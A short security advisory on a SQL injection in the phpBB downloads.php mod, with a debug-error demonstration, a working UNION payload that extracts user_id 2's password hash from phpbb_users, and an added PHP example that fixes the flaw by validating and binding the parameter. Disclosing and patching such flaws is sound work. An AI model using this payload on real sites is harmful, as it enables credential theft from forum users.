The downloads.php mod in phpBB versions 2.0.13 and below is susceptible to SQL injection attacks.
Here's an update of the paper:
phpBB 2.0.13 <= downloads.php Mod SQL injection
[ www.batznet.com ]
##############################################
Discussion:
--------------------
This exploit makes it possible to insert SQL code through the cat parameter of downloads.php, which ends up in the query unquoted and unvalidated.
Bug:
--------------------
http://www.phpbb.de/downloads.php?cat=batz
Spits out an error msg:
Could not query downloads
DEBUG MODE
SQL Error : 1054 Unknown column 'leet' in 'where clause'
SELECT * FROM phpbb2_downloads where cat=leet ORDER by sort
Line : 106
File : downloads.php
Exploit:
--------------------
/downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=2/*
This gives the MD5 hash from UID 2!
Patch:
-------------------
Don't use this mod. :)
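If the mod has to stay in use, the query shown in the debug output can be closed off by validating cat as an integer and binding it as a parameter. The following is an added example, not the mod's source: the helper names, the table layout apart from the cat and sort columns, and the use of PDO with in-memory SQLite in place of phpBB's MySQL layer are all assumptions.

```php
<?php
// Added example, not the mod's code. SQLite in memory stands in for MySQL;
// the table layout is an assumption apart from the `cat` and `sort` columns.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE downloads (id INTEGER, cat INTEGER, name TEXT, sort INTEGER)');
$pdo->exec("INSERT INTO downloads VALUES
    (1, 1, 'constructed-a', 2), (2, 1, 'constructed-b', 1), (3, 2, 'constructed-c', 1)");

// Accept only a short run of ASCII digits; anything else is not a category id.
function parse_cat($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Hypothetical helper: list the downloads of one category.
function downloads_in_category(PDO $pdo, $rawCat): array
{
    $cat = parse_cat($rawCat);
    if ($cat === null) {
        return []; // rejected before any SQL is built
    }
    // The value is bound as an integer parameter and never concatenated
    // into the statement text.
    $stmt = $pdo->prepare('SELECT id, name FROM downloads WHERE cat = :cat ORDER BY sort');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a valid id, the non-numeric value from the error
// message above, and a value shaped like the UNION request.
foreach (['1', 'leet', '-1 UNION SELECT 0'] as $input) {
    $rows = downloads_in_category($pdo, $input);
    printf("cat=%-22s rows=%d\n", var_export($input, true), count($rows));
}
```

The rejected branch returns an empty result instead of echoing the database error, so the query text and table prefix seen in the debug output above are not disclosed to the client.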
Greetz:
-------------------
Greetz fly out to R_Q, darkkilla, Madinfect, EaTh, kr3mliyn
// written by [R]
// 02.04.2005